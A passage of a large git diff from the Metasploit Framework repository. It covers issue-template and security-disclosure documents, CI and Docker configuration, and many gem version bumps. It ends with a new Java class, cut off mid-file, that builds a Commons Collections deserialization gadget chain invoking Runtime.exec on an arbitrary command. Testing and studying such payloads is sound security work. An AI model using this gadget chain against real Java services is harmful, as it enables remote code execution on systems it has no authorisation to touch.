automatic module_metadata_base.json update

Land #14262 , Correct description of services provided by Cloudflare
Cloudflare (NYSE:NET) is an independent company and unrelated to Amazon (NASDAQ: AMZN)
2020-10-13 14:57:09 -05:00 · 2020-10-13 14:48:18 -05:00 · 2020-10-10 00:13:43 +08:00 · 2020-10-08 17:36:23 -05:00 · 2020-10-08 23:29:32 +01:00 · 2020-10-08 15:30:56 -05:00
2499 changed files with 29258 additions and 6813 deletions
@@ -37,24 +37,18 @@ What should happen?

 What happens instead?

-You might also want to check the last ~1k lines of
-`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
-`~/.msf4/logs/framework.log` for relevant stack traces
-
-
-## System stuff
-
 ### Metasploit version

 Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

-### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)
+## Additional Information
+If your version is less than `5.0.96`, please update to the latest version and ensure your issue is still present.

-### OS
-
-What OS are you running Metasploit on?
+If the issue is encountered within `msfconsole`, please run the `debug` command using the instructions below. If the issue is encountered outisde `msfconsole`, or the issue causes `msfconsole` to crash on startup, please delete this section.

+1. Start `msfconsole`
+2. Run the command `set loglevel 3`
+3. Take the steps necessary recreate your issue
+4. Run the `debug` command
+5. Copy all the output below the `===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===` line and make sure to **REMOVE ANY SENSITIVE INFORMATION.**
+6. Replace these instructions and the paragraph above with the output from step 5.
@@ -0,0 +1,35 @@
+# Reporting security issues
+
+Thanks for your interest in making Metasploit more secure! If you feel
+that you have found a security issue involving Metasploit, Meterpreter,
+Recog, or any other Rapid7 open source project, you are welcome to let
+us know in the way that's most comfortable for you.
+
+## Via ZenDesk
+
+You can click on the big blue button at [Rapid7's Vulnerability
+Disclosure][r7-vulns] page, which will get you to our general
+vulnerability reporting system. While this does require a (free) ZenDesk
+account to use, you'll get regular updates on your issue as our software
+support teams work through it. As it happens [that page][r7-vulns] also
+will tell you what to expect when it comes to reporting vulns, how fast
+we'll fix and respond, and all the rest, so it's a pretty good read
+regardless.
+
+## Via email
+
+If you're more of a traditionalist, you can email your finding to
+security@rapid7.com. If you like, you can use our [PGP key][pgp] to
+encrypt your messages, but we certainly don't mind cleartext reports
+over email.
+
+## NOT via GitHub Issues
+
+Please don't! Disclosing security vulnerabilities to public bug trackers
+is kind of mean, even when it's well-intentioned, since you end up
+dropping 0-day on pretty much everyone right out of the gate. We'd prefer
+you didn't!
+
+[r7-vulns]:https://www.rapid7.com/security/disclosure/
+[pgp]:https://keybase.io/rapid7/pgp_keys.asc?fingerprint=9a90aea0576cbcafa39c502ba5e16807959d3eda
+
@@ -1,6 +1,6 @@
 on:
  schedule:
-    - cron: "0 16 * * *"
+    - cron: "0 15 * * *"
 name: Stale Bot workflow
 jobs:
  build:
@@ -14,7 +14,7 @@ jobs:
          repo-token: ${{ secrets.GITHUB_TOKEN }}
          days-before-stale: 30
          days-before-close: 30
-          operations-per-run: 10
+          operations-per-run: 50
          stale-issue-message: |
            Hi!

@@ -32,5 +32,5 @@ jobs:

            As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
          exempt-issue-labels: |
-            not stale
-          debug-only: true
+            not-stale,confirmed,easy,newbie-friendly,suggestion,suggestion-module,suggestion-feature,suggestion-docs
+          debug-only: false
@@ -9,6 +9,7 @@ bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
 bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
 cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
 cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
+cgranleese-r7 <cgranleese-r7@github>   <christopher_granleese@rapid7.com>
 dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
 dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
 ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
@@ -14,6 +14,8 @@ AllCops:
 require:
  - ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
  - ./lib/rubocop/cop/layout/module_description_indentation.rb
+  - ./lib/rubocop/cop/lint/module_disclosure_date_format.rb
+  - ./lib/rubocop/cop/lint/module_disclosure_date_present.rb

 Layout/ModuleHashOnNewLine:
  Enabled: true
@@ -21,6 +23,14 @@ Layout/ModuleHashOnNewLine:
 Layout/ModuleDescriptionIndentation:
  Enabled: true

+Lint/ModuleDisclosureDateFormat:
+  Enabled: true
+
+Lint/ModuleDisclosureDatePresent:
+  Include:
+    # Only exploits require disclosure dates, but they can be present in auxiliary modules etc.
+    - 'modules/exploits/**/*'
+
 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
  Enabled: true
@@ -13,6 +13,7 @@ language: ruby
 rvm:
  - '2.5.8'
  - '2.6.6'
+  - '2.7.1'

 env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -43,7 +44,7 @@ before_install:
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
  # Update the bundler
-  - gem update --system 3.0.6
+  - gem update --system
  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
@@ -1,7 +1,7 @@
 FROM ruby:2.6.6-alpine3.10 AS builder
 LABEL maintainer="Rapid7"

-ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
+ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
 ENV APP_HOME=/usr/src/metasploit-framework
 ENV BUNDLE_IGNORE_MESSAGES="true"
 WORKDIR $APP_HOME
@@ -28,15 +28,16 @@ RUN apk add --no-cache \
      ncurses-dev \
      git \
    && echo "gem: --no-document" > /etc/gemrc \
-    && gem update --system 3.0.6 \
-    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
+    && gem update --system \
+    && bundle config $BUNDLER_ARGS \
+    && bundle install --redownload --jobs=8 \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
    && chmod -R a+r /usr/local/bundle


-FROM ruby:2.6.5-alpine3.10
+FROM ruby:2.6.6-alpine3.10
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -46,7 +47,7 @@ ENV METASPLOIT_GROUP=metasploit
 # used for the copy command
 RUN addgroup -S $METASPLOIT_GROUP

-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
+RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec alpine-sdk python2-dev openssl-dev py-pip

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -56,7 +57,9 @@ RUN chown -R root:metasploit /usr/local/bundle
 COPY . $APP_HOME/
 RUN chown -R root:metasploit $APP_HOME/
 RUN chmod 664 $APP_HOME/Gemfile.lock
+RUN gem update --system
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
+RUN pip install impacket

 WORKDIR $APP_HOME

@@ -27,6 +27,9 @@ end

 # Create a custom group
 group :local do
-  # Add the lab gem so that the 'lab' plugin will work again
+  # This is the first way to add a non-standard gem file dependency in.
  gem 'lab', '~> 0.2.7'
+  # And this is another way that references local directories to find and compile the gem file as needed.
+  # This is the optimal method for testing Gem PRs such as those in rex-text or rex-powershell.
+  gem 'rex-powershell', path: '../rex-powershell'
 end
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.0.2)
+    metasploit-framework (6.0.11)
      actionpack (~> 5.2.2)
      activerecord (~> 5.2.2)
      activesupport (~> 5.2.2)
@@ -29,7 +29,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.10)
+      metasploit-payloads (= 2.0.16)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.2)
      mqtt
@@ -89,26 +89,26 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.0.3)
-    actionpack (5.2.4.3)
-      actionview (= 5.2.4.3)
-      activesupport (= 5.2.4.3)
+    actionpack (5.2.4.4)
+      actionview (= 5.2.4.4)
+      activesupport (= 5.2.4.4)
      rack (~> 2.0, >= 2.0.8)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (5.2.4.3)
-      activesupport (= 5.2.4.3)
+    actionview (5.2.4.4)
+      activesupport (= 5.2.4.4)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (5.2.4.3)
-      activesupport (= 5.2.4.3)
-    activerecord (5.2.4.3)
-      activemodel (= 5.2.4.3)
-      activesupport (= 5.2.4.3)
+    activemodel (5.2.4.4)
+      activesupport (= 5.2.4.4)
+    activerecord (5.2.4.4)
+      activemodel (= 5.2.4.4)
+      activesupport (= 5.2.4.4)
      arel (>= 9.0)
-    activesupport (5.2.4.3)
+    activesupport (5.2.4.4)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 0.7, < 2)
      minitest (~> 5.1)
@@ -121,28 +121,28 @@ GEM
      activerecord (>= 3.1.0, < 7)
    ast (2.4.1)
    aws-eventstream (1.1.0)
-    aws-partitions (1.354.0)
-    aws-sdk-core (3.104.3)
+    aws-partitions (1.380.0)
+    aws-sdk-core (3.109.1)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.186.0)
-      aws-sdk-core (~> 3, >= 3.99.0)
+    aws-sdk-ec2 (1.199.0)
+      aws-sdk-core (~> 3, >= 3.109.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.43.0)
-      aws-sdk-core (~> 3, >= 3.99.0)
+    aws-sdk-iam (1.46.0)
+      aws-sdk-core (~> 3, >= 3.109.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.36.0)
-      aws-sdk-core (~> 3, >= 3.99.0)
+    aws-sdk-kms (1.39.0)
+      aws-sdk-core (~> 3, >= 3.109.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.78.0)
-      aws-sdk-core (~> 3, >= 3.104.3)
+    aws-sdk-s3 (1.83.0)
+      aws-sdk-core (~> 3, >= 3.109.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.2.1)
+    aws-sigv4 (1.2.2)
      aws-eventstream (~> 1, >= 1.0.2)
-    bcrypt (3.1.15)
+    bcrypt (3.1.16)
    bcrypt_pbkdf (1.0.1)
    bindata (2.4.8)
    bit-struct (0.16)
@@ -159,7 +159,7 @@ GEM
      simpleidn (~> 0.1)
    docile (1.3.2)
    ed25519 (1.2.4)
-    em-http-request (1.1.6)
+    em-http-request (1.1.7)
      addressable (>= 2.3.4)
      cookiejar (!= 0.3.1)
      em-socksify (>= 0.3)
@@ -174,7 +174,7 @@ GEM
    factory_bot_rails (6.1.0)
      factory_bot (~> 6.1.0)
      railties (>= 5.0.0)
-    faker (2.13.0)
+    faker (2.14.0)
      i18n (>= 1.6, < 2)
    faraday (1.0.1)
      multipart-post (>= 1.2, < 3)
@@ -190,13 +190,13 @@ GEM
    i18n (1.8.5)
      concurrent-ruby (~> 1.0)
    io-console (0.5.6)
-    irb (1.2.4)
-      reline (>= 0.0.1)
+    irb (1.2.7)
+      reline (>= 0.1.5)
    jmespath (1.4.0)
    jsobfu (0.4.2)
      rkelly-remix
    json (2.3.1)
-    loofah (2.6.0)
+    loofah (2.7.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
    memory_profiler (0.9.14)
@@ -215,31 +215,31 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (3.0.0)
+    metasploit-model (3.1.2)
      activemodel (~> 5.2.2)
      activesupport (~> 5.2.2)
      railties (~> 5.2.2)
-    metasploit-payloads (2.0.10)
-    metasploit_data_models (4.0.2)
+    metasploit-payloads (2.0.16)
+    metasploit_data_models (4.1.0)
      activerecord (~> 5.2.2)
      activesupport (~> 5.2.2)
      arel-helpers
      metasploit-concern
-      metasploit-model
+      metasploit-model (>= 3.1)
      pg
      railties (~> 5.2.2)
      recog (~> 2.0)
    metasploit_payloads-mettle (1.0.2)
    method_source (1.0.0)
    mini_portile2 (2.4.0)
-    minitest (5.14.1)
+    minitest (5.14.2)
    mqtt (0.5.0)
    msgpack (1.3.3)
    multipart-post (2.1.1)
    mustermann (1.1.1)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-ldap (0.16.2)
+    net-ldap (0.16.3)
    net-ssh (6.1.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
@@ -254,11 +254,11 @@ GEM
    packetfu (1.1.13)
      pcaprub
    parallel (1.19.2)
-    parser (2.7.1.4)
+    parser (2.7.2.0)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.0)
-    pdf-reader (2.4.0)
+    pdf-reader (2.4.1)
      Ascii85 (~> 1.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
@@ -271,9 +271,9 @@ GEM
    pry-byebug (3.9.0)
      byebug (~> 11.0)
      pry (~> 0.13.0)
-    public_suffix (4.0.5)
+    public_suffix (4.0.6)
    rack (2.2.3)
-    rack-protection (2.0.8.1)
+    rack-protection (2.1.0)
      rack
    rack-test (1.1.0)
      rack (>= 1.0, < 3)
@@ -282,9 +282,9 @@ GEM
      nokogiri (>= 1.6)
    rails-html-sanitizer (1.3.0)
      loofah (~> 2.3)
-    railties (5.2.4.3)
-      actionpack (= 5.2.4.3)
-      activesupport (= 5.2.4.3)
+    railties (5.2.4.4)
+      actionpack (= 5.2.4.4)
+      activesupport (= 5.2.4.4)
      method_source
      rake (>= 0.8.7)
      thor (>= 0.19.0, < 2.0)
@@ -294,8 +294,8 @@ GEM
    recog (2.3.14)
      nokogiri
    redcarpet (3.5.0)
-    regexp_parser (1.7.1)
-    reline (0.1.4)
+    regexp_parser (1.8.1)
+    reline (0.1.5)
      io-console (~> 0.5)
    rex-arch (0.1.13)
      rex-text
@@ -334,7 +334,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.23)
+    rex-socket (0.1.24)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
@@ -350,7 +350,7 @@ GEM
      rspec-core (~> 3.9.0)
      rspec-expectations (~> 3.9.0)
      rspec-mocks (~> 3.9.0)
-    rspec-core (3.9.2)
+    rspec-core (3.9.3)
      rspec-support (~> 3.9.3)
    rspec-expectations (3.9.2)
      diff-lcs (>= 1.2.0, < 2.0)
@@ -369,23 +369,23 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.9.3)
-    rubocop (0.89.1)
+    rubocop (0.93.0)
      parallel (~> 1.10)
-      parser (>= 2.7.1.1)
+      parser (>= 2.7.1.5)
      rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 1.7)
+      regexp_parser (>= 1.8)
      rexml
-      rubocop-ast (>= 0.3.0, < 1.0)
+      rubocop-ast (>= 0.6.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 1.4.0, < 2.0)
-    rubocop-ast (0.3.0)
-      parser (>= 2.7.1.4)
+    rubocop-ast (0.7.1)
+      parser (>= 2.7.1.5)
    ruby-macho (2.2.0)
    ruby-prof (1.4.1)
    ruby-progressbar (1.10.1)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.2)
-    ruby_smb (2.0.2)
+    ruby_smb (2.0.6)
      bindata
      openssl-ccm
      openssl-cmac
@@ -399,13 +399,13 @@ GEM
    simplecov (0.18.2)
      docile (~> 1.1)
      simplecov-html (~> 0.11)
-    simplecov-html (0.12.2)
+    simplecov-html (0.12.3)
    simpleidn (0.1.1)
      unf (~> 0.1.4)
-    sinatra (2.0.8.1)
+    sinatra (2.1.0)
      mustermann (~> 1.0)
-      rack (~> 2.0)
-      rack-protection (= 2.0.8.1)
+      rack (~> 2.2)
+      rack-protection (= 2.1.0)
      tilt (~> 2.0)
    sqlite3 (1.3.13)
    sshkey (2.0.0)
@@ -421,14 +421,14 @@ GEM
    ttfunk (1.6.2.1)
    tzinfo (1.2.7)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2020.1)
+    tzinfo-data (1.2020.2)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.7.7)
    unicode-display_width (1.7.0)
-    warden (1.2.8)
-      rack (>= 2.0.6)
+    warden (1.2.9)
+      rack (>= 2.0.9)
    websocket-driver (0.7.3)
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
@@ -462,4 +462,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   1.17.3
+   2.1.4
@@ -1,30 +1,30 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.0.3, MIT
-actionpack, 5.2.4.3, MIT
-actionview, 5.2.4.3, MIT
-activemodel, 5.2.4.3, MIT
-activerecord, 5.2.4.3, MIT
-activesupport, 5.2.4.3, MIT
+actionpack, 5.2.4.4, MIT
+actionview, 5.2.4.4, MIT
+activemodel, 5.2.4.4, MIT
+activerecord, 5.2.4.4, MIT
+activesupport, 5.2.4.4, MIT
 addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 9.0.0, MIT
 arel-helpers, 2.11.0, MIT
 ast, 2.4.1, MIT
 aws-eventstream, 1.1.0, "Apache 2.0"
-aws-partitions, 1.354.0, "Apache 2.0"
-aws-sdk-core, 3.104.3, "Apache 2.0"
-aws-sdk-ec2, 1.186.0, "Apache 2.0"
-aws-sdk-iam, 1.43.0, "Apache 2.0"
-aws-sdk-kms, 1.36.0, "Apache 2.0"
-aws-sdk-s3, 1.78.0, "Apache 2.0"
-aws-sigv4, 1.2.1, "Apache 2.0"
-bcrypt, 3.1.15, MIT
+aws-partitions, 1.380.0, "Apache 2.0"
+aws-sdk-core, 3.109.1, "Apache 2.0"
+aws-sdk-ec2, 1.199.0, "Apache 2.0"
+aws-sdk-iam, 1.46.0, "Apache 2.0"
+aws-sdk-kms, 1.39.0, "Apache 2.0"
+aws-sdk-s3, 1.83.0, "Apache 2.0"
+aws-sigv4, 1.2.2, "Apache 2.0"
+bcrypt, 3.1.16, MIT
 bcrypt_pbkdf, 1.0.1, MIT
 bindata, 2.4.8, ruby
 bit-struct, 0.16, ruby
 bson, 4.10.0, "Apache 2.0"
 builder, 3.2.4, MIT
-bundler, 1.17.3, MIT
+bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
 coderay, 1.1.3, MIT
 concurrent-ruby, 1.0.5, MIT
@@ -35,13 +35,13 @@ diff-lcs, 1.4.4, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.4, "Apache 2.0"
 docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
-em-http-request, 1.1.6, MIT
+em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
 erubi, 1.9.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.1.0, MIT
 factory_bot_rails, 6.1.0, MIT
-faker, 2.13.0, MIT
+faker, 2.14.0, MIT
 faraday, 1.0.1, MIT
 faye-websocket, 0.11.0, "Apache 2.0"
 filesize, 0.2.0, MIT
@@ -51,29 +51,29 @@ hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
 http_parser.rb, 0.6.0, MIT
 i18n, 1.8.5, MIT
 io-console, 0.5.6, "Simplified BSD"
-irb, 1.2.4, "Simplified BSD"
+irb, 1.2.7, "ruby, Simplified BSD"
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.3.1, ruby
-loofah, 2.6.0, MIT
+loofah, 2.7.0, MIT
 memory_profiler, 0.9.14, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 3.0.0, "New BSD"
 metasploit-credential, 4.0.2, "New BSD"
-metasploit-framework, 6.0.2, "New BSD"
-metasploit-model, 3.0.0, "New BSD"
-metasploit-payloads, 2.0.10, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 4.0.2, "New BSD"
+metasploit-framework, 6.0.11, "New BSD"
+metasploit-model, 3.1.2, "New BSD"
+metasploit-payloads, 2.0.16, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 4.1.0, "New BSD"
 metasploit_payloads-mettle, 1.0.2, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.14.1, MIT
+minitest, 5.14.2, MIT
 mqtt, 0.5.0, MIT
 msgpack, 1.3.3, "Apache 2.0"
 multipart-post, 2.1.1, MIT
 mustermann, 1.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ldap, 0.16.2, MIT
+net-ldap, 0.16.3, MIT
 net-ssh, 6.1.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
@@ -84,27 +84,27 @@ openssl-cmac, 2.0.1, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.19.2, MIT
-parser, 2.7.1.4, MIT
+parser, 2.7.2.0, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
-pdf-reader, 2.4.0, MIT
+pdf-reader, 2.4.1, MIT
 pg, 1.2.3, "Simplified BSD"
 pry, 0.13.1, MIT
 pry-byebug, 3.9.0, MIT
-public_suffix, 4.0.5, MIT
+public_suffix, 4.0.6, MIT
 rack, 2.2.3, MIT
-rack-protection, 2.0.8.1, MIT
+rack-protection, 2.1.0, MIT
 rack-test, 1.1.0, MIT
 rails-dom-testing, 2.0.3, MIT
 rails-html-sanitizer, 1.3.0, MIT
-railties, 5.2.4.3, MIT
+railties, 5.2.4.4, MIT
 rainbow, 3.0.0, MIT
 rake, 13.0.1, MIT
 rb-readline, 0.5.5, BSD
 recog, 2.3.14, unknown
 redcarpet, 3.5.0, MIT
-regexp_parser, 1.7.1, MIT
-reline, 0.1.4, "Ruby License"
+regexp_parser, 1.8.1, MIT
+reline, 0.1.5, ruby
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
@@ -118,7 +118,7 @@ rex-powershell, 0.1.87, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.23, "New BSD"
+rex-socket, 0.1.24, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.28, "New BSD"
@@ -126,27 +126,27 @@ rex-zip, 0.1.3, "New BSD"
 rexml, 3.2.4, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.9.0, MIT
-rspec-core, 3.9.2, MIT
+rspec-core, 3.9.3, MIT
 rspec-expectations, 3.9.2, MIT
 rspec-mocks, 3.9.1, MIT
 rspec-rails, 4.0.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.9.3, MIT
-rubocop, 0.89.1, MIT
-rubocop-ast, 0.3.0, MIT
+rubocop, 0.93.0, MIT
+rubocop-ast, 0.7.1, MIT
 ruby-macho, 2.2.0, MIT
 ruby-prof, 1.4.1, "Simplified BSD"
 ruby-progressbar, 1.10.1, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.2, ruby
-ruby_smb, 2.0.2, "New BSD"
+ruby_smb, 2.0.6, "New BSD"
 rubyntlm, 0.6.2, MIT
 rubyzip, 2.3.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
 simplecov, 0.18.2, MIT
-simplecov-html, 0.12.2, MIT
+simplecov-html, 0.12.3, MIT
 simpleidn, 0.1.1, MIT
-sinatra, 2.0.8.1, MIT
+sinatra, 2.1.0, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
@@ -157,11 +157,11 @@ tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
 ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.7, MIT
-tzinfo-data, 1.2020.1, MIT
+tzinfo-data, 1.2020.2, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.7.7, MIT
 unicode-display_width, 1.7.0, MIT
-warden, 1.2.8, MIT
+warden, 1.2.9, MIT
 websocket-driver, 0.7.3, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 windows_error, 0.1.2, BSD
@@ -0,0 +1,191 @@
+package org.vulhub;
+
+import java.io.FileOutputStream;
+import java.io.ObjectOutputStream;
+import java.io.ObjectStreamException;
+import java.io.Serializable;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.PrivateKey;
+import java.security.PublicKey;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.Comparator;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+import java.util.concurrent.ConcurrentSkipListSet;
+import java.util.concurrent.CopyOnWriteArraySet;
+
+import net.sf.json.JSONArray;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.collection.AbstractCollectionDecorator;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+import org.apache.commons.collections.map.ReferenceMap;
+import org.apache.commons.collections.set.ListOrderedSet;
+
+public class Payload implements Serializable {
+
+    private Serializable payload;
+
+    private Payload(String cmd) throws Exception {
+
+        this.payload = this.setup(cmd);
+
+    }
+
+    private Serializable setup(String cmd) throws Exception {
+        final String[] execArgs = new String[] { cmd };
+
+        final Transformer[] transformers = new Transformer[] {
+                new ConstantTransformer(Runtime.class),
+                new InvokerTransformer("getMethod", new Class[] { String.class,
+                        Class[].class }, new Object[] { "getRuntime",
+                        new Class[0] }),
+                new InvokerTransformer("invoke", new Class[] { Object.class,
+                        Object[].class }, new Object[] { null, new Object[0] }),
+                new InvokerTransformer("exec", new Class[] { String.class },
+                        execArgs), new ConstantTransformer(1) };
+
+        Transformer transformerChain = new ChainedTransformer(transformers);
+
+        final Map innerMap = new HashMap();
+
+        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+
+        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
+
+        HashSet map = new HashSet(1);
+        map.add("foo");
+        Field f = null;
+        try {
+            f = HashSet.class.getDeclaredField("map");
+        } catch (NoSuchFieldException e) {
+            f = HashSet.class.getDeclaredField("backingMap");
+        }
+
+        f.setAccessible(true);
+        HashMap innimpl = (HashMap) f.get(map);
+
+        Field f2 = null;
+        try {
+            f2 = HashMap.class.getDeclaredField("table");
+        } catch (NoSuchFieldException e) {
+            f2 = HashMap.class.getDeclaredField("elementData");
+        }
+
+        f2.setAccessible(true);
+        Object[] array2 = (Object[]) f2.get(innimpl);
+
+        Object node = array2[0];
+        if (node == null) {
+            node = array2[1];
+        }
+
+        Field keyField = null;
+        try {
+            keyField = node.getClass().getDeclaredField("key");
+        } catch (Exception e) {
+            keyField = Class.forName("java.util.MapEntry").getDeclaredField(
+                    "key");
+        }
+
+        keyField.setAccessible(true);
+        keyField.set(node, entry);
+
+        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
+        keyPairGenerator.initialize(1024);
+        KeyPair keyPair = keyPairGenerator.genKeyPair();
+        PrivateKey privateKey = keyPair.getPrivate();
+        PublicKey publicKey = keyPair.getPublic();
+
+        Signature signature = Signature.getInstance(privateKey.getAlgorithm());
+        SignedObject payload = new SignedObject(map, privateKey, signature);
+        JSONArray array = new JSONArray();
+
+        array.add("asdf");
+
+        ListOrderedSet set = new ListOrderedSet();
+        Field f1 = AbstractCollectionDecorator.class
+                .getDeclaredField("collection");
+        f1.setAccessible(true);
+        f1.set(set, array);
+
+        DummyComperator comp = new DummyComperator();
+        ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);
+        csls.add(payload);
+
+        CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();
+        CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();
+
+        a1.add(set);
+        Container c = new Container(csls);
+        a1.add(c);
+
+        a2.add(csls);
+        a2.add(set);
+
+        ReferenceMap flat3map = new ReferenceMap();
+        flat3map.put(new Container(a1), "asdf");
+        flat3map.put(new Container(a2), "asdf");
+
+        return flat3map;
+    }
+
+    private Object writeReplace() throws ObjectStreamException {
+        return this.payload;
+    }
+
+    private static class Container implements Serializable {
+
+        private Object o;
+
+        private Container(Object o) {
+            this.o = o;
+        }
+
+        private Object writeReplace() throws ObjectStreamException {
+            return o;
+        }
+
+    }
+
+    static class DummyComperator implements Comparator, Serializable {
+
+        public int compare(Object arg0, Object arg1) {
+            // TODO Auto-generated method stub
+            return 0;
+        }
+
+        private Object writeReplace() throws ObjectStreamException {
+            return null;
+        }
+
+    }
+
+    public static void main(String args[]) throws Exception{
+
